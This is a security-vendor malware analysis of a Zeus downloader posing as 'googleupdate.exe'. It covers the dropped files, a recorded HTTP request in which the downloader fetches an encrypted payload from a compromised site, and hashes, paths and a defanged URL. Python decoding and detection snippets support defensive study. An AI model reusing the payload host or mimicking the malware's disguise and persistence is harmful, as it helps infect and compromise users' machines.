Zeus Downloader Comes as GoogleUpdate

After last month’s paper, which described how Zeus with the additional Necurs rootkit functionality on board can infect 64-bit Windows by installing system notifiers, we saw an increase in samples coming into the lab this month, totalling 568 samples.
In this paper we will analyze the installation stage, for which the Zeus downloader is responsible.

1. The GoogleUpdate

In a Lavasoft MAS Zbot report we see that it copies and renames itself as “googleupdate.exe” (MD5: 795ae0d1bb3d3494c8b9be94b04ba2b5, detected by Ad-Aware as Trojan.GenericKD.1568342). Malware writers are known to disguise files to make them look like Google applications – it’s a simple trick that helps the malware stay under the radar.
Last year we analysed an attack using the Microsoft 0-day exploit CVE-2013-3906 which used the original GoogleUpdate.exe (116 648 bytes, MD5: 506708142bc63daba64f2d3ad1dcd5bf), signed by Google, to run a malicious DLL named after the legitimate one, “Goopdate.dll” (MD5: e4cb1ea2667f1b3b712f4402f0737627), as shown in the picture below.

This time we found the fake “googleupdate.exe” among the dropped files:

MD5                               File path
45374c8171f17fc159ecb0c51cf082d8  c:\Documents and Settings\"%CurrentUserName%"\Application Data\Exwehu\yqvyi.exe
795ae0d1bb3d3494c8b9be94b04ba2b5  c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\googleupdate.exe

The first file, “googleupdate.exe”, is a copy of the Zeus downloader (16 896 bytes in size, MD5: c70b46ebbe517c26e3e7c4de716e8e3f) with the execution path of the original backdoor file appended:

This minor change to the file means the Zeus copy has a different size and hash value from the original.

2. The Downloadee

Another file, randomly named “yqvyi.exe” (372 224 bytes), was downloaded from a server in the United States:

URL                                                                    IP
hxxp://londonroofingroofers.co.uk/wp-content/uploads/2013/12/13UKp.z12  66.221.228.55

Two URLs are hardcoded inside the downloader body (the first URL was offline):

The file, which starts with a ZZP signature, was delivered in packed form (the LZNT1 compressor was used) and encrypted with a 32-bit XOR key (in this case “0x8B537673”), as previously described in Zeus Backdoor Adopts Extra Rootkit Abilities:

GET /wp-content/uploads/2013/12/13UKp.z12 HTTP/1.1
Accept: text/*, application/*
User-Agent: Updates downloader
Host: londonroofingroofers.co.uk
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Mon, 28 Apr 2014 00:52:56 GMT
Server: Apache/2.2.26 (Unix) mod_ssl/2.2.26 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Last-Modified: Thu, 13 Feb 2014 03:46:35 GMT
ETag: "5a4ecd-4bf98-4f2418935c1ea"
Accept-Ranges: bytes
Content-Length: 311192
Content-Type: text/plain; charset=UTF-8
ZZP.Q...,..Pvs..rs...s..vK.Rv3.kls.Sv}.L.}.....S.r..W'.:v..#...!.s.s..
<<< skipped >>>

After decrypting and unpacking the downloaded file (13UKp.z12) we see the following PE file (372 224 bytes, which matches the size of the above-mentioned “yqvyi.exe”):

You can download the decryption tool for Zeus archives (MD5: 7e75febf814643c4f66b590886458fea).
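As an added illustration of the two layers that tool has to undo, the following Python (written for this page, not Lavasoft’s tool) reverses a repeating 32-bit XOR and then decompresses LZNT1, handling the uncompressed-chunk and end-of-stream cases a naive decoder gets wrong. The ZZP container layout beyond the three-byte signature, the little-endian byte order of the key and the absence of any further header are assumptions, as is the sample chunk, which is constructed for the test.

```python
import struct

# Constructed sample (not from the Lavasoft report): one LZNT1 chunk expanding
# to b"ABCABCABCABC"; the key is the 32-bit XOR key quoted in the write-up.
KEY = 0x8B537673
COMPRESSED = bytes.fromhex("05b0084142430620")

def xor32(data: bytes, key: int) -> bytes:
    kb = struct.pack("<I", key)  # repeating little-endian key, self-inverse
    return bytes(b ^ kb[i % 4] for i, b in enumerate(data))

def lznt1_decompress(data: bytes) -> bytes:
    """LZNT1 (MS-XCA): 2-byte chunk header, then a flag byte per 8 tokens."""
    out, pos = bytearray(), 0
    while pos + 2 <= len(data):
        hdr = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        if hdr == 0:                    # end-of-stream marker
            break
        end = pos + (hdr & 0xFFF) + 1   # low 12 bits: body length - 1
        if not hdr & 0x8000:            # chunk stored uncompressed
            out += data[pos:end]
            pos = end
            continue
        start = len(out)                # back-references are chunk-relative
        while pos < end:
            flags, pos = data[pos], pos + 1
            for bit in range(8):
                if pos >= end:
                    break
                if not flags & (1 << bit):   # literal byte
                    out.append(data[pos])
                    pos += 1
                    continue
                # more bytes already emitted in this chunk -> more token bits go to displacement
                n, lg = len(out) - start - 1, 0
                while n >= 0x10:
                    n, lg = n >> 1, lg + 1
                tok = struct.unpack_from("<H", data, pos)[0]
                pos += 2
                disp = (tok >> (12 - lg)) + 1
                length = (tok & (0xFFF >> lg)) + 3
                for _ in range(length):  # byte-wise copy so overlap works
                    out.append(out[-disp])
    return bytes(out)
def unpack_zzp(blob: bytes, key: int) -> bytes:
    """Strip the assumed 3-byte 'ZZP' tag, undo the XOR, then decompress."""
    if blob[:3] != b"ZZP":
        raise ValueError("not a ZZP container")
    return lznt1_decompress(xor32(blob[3:], key))
```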
The unpacked backdoor, like “googleupdate.exe”, contains encrypted extra data after the resource section:

The picture above shows that the downloader modifies the data at the end of the downloaded file when saving it to disk, which results in different MD5 hashes of the installed trojan.
The whole process of Zeus installation is shown in Process Monitor:

The initial downloader process launches a copy of itself as ‘googleupdate.exe’. Googleupdate.exe then downloads and runs the randomly named lkajsd.exe, which finally copies itself as fefo.exe (a.k.a. “yqvyi.exe” – again, the name is random) into «c:\Documents and Settings\"%CurrentUserName%"\Application Data\\», from where it will be started every time Windows boots up. By doing so, Zeus obfuscates its installation and complicates analysis.

3. Static Analysis

The Import Address Table of the downloader does not contain any functions that point to downloading abilities. However, after decryption it loads the necessary Internet functions from urlmon.dll.

“Innocent” Zeus downloader IAT

It should be noted that both the downloader and the downloadee use Windows messaging to communicate with each other.

The installed backdoor creates a window with a class name “Huntsville” and a window name “liquorice”.
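The window class and title above are a host-level indicator a responder can sweep for. The following Python is an added example for this page, not Lavasoft’s tooling: it enumerates top-level windows through user32 on Windows (elsewhere it returns nothing) and keeps the matching logic separate so it can be tested on any platform; the sample window list and its PIDs are constructed.

```python
import sys

# Indicators from the write-up: the installed backdoor creates a window with
# this class name and window title.
ZEUS_WINDOW_CLASS = "Huntsville"
ZEUS_WINDOW_TITLE = "liquorice"

# Constructed sample of what enumerate_windows() returns on an infected host.
SAMPLE_WINDOWS = [
    (1204, "Shell_TrayWnd", ""),
    (3120, "Huntsville", "liquorice"),
    (3388, "Notepad", "Untitled - Notepad"),
]

def match_zeus_windows(windows):
    """Return (pid, class, title) for entries matching either indicator.
    `windows` is an iterable of (pid, class_name, title) tuples."""
    return [(pid, cls, title) for pid, cls, title in windows
            if cls == ZEUS_WINDOW_CLASS or title == ZEUS_WINDOW_TITLE]

def enumerate_windows():
    """Windows only: (pid, class_name, title) for every top-level window,
    collected via user32 EnumWindows; returns [] on other platforms."""
    if sys.platform != "win32":
        return []
    import ctypes
    from ctypes import wintypes
    user32 = ctypes.WinDLL("user32", use_last_error=True)
    enum_proc = ctypes.WINFUNCTYPE(wintypes.BOOL, wintypes.HWND, wintypes.LPARAM)
    user32.EnumWindows.argtypes = [enum_proc, wintypes.LPARAM]
    found = []

    def on_window(hwnd, _lparam):
        cls = ctypes.create_unicode_buffer(256)
        title = ctypes.create_unicode_buffer(256)
        user32.GetClassNameW(hwnd, cls, 256)
        user32.GetWindowTextW(hwnd, title, 256)
        pid = wintypes.DWORD()
        user32.GetWindowThreadProcessId(hwnd, ctypes.byref(pid))
        found.append((pid.value, cls.value, title.value))
        return True  # keep enumerating

    user32.EnumWindows(enum_proc(on_window), 0)
    return found

if __name__ == "__main__":
    for pid, cls, title in match_zeus_windows(enumerate_windows()):
        print(f"suspicious window: pid={pid} class={cls!r} title={title!r}")
```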

We will continue monitoring new versions of Zeus collected by the Lab for new features.

Read also:
Lavasoft Security Bulletin - April 2014: Bot Review.

Lavasoft Security Bulletin - April 2014: Top Threats.
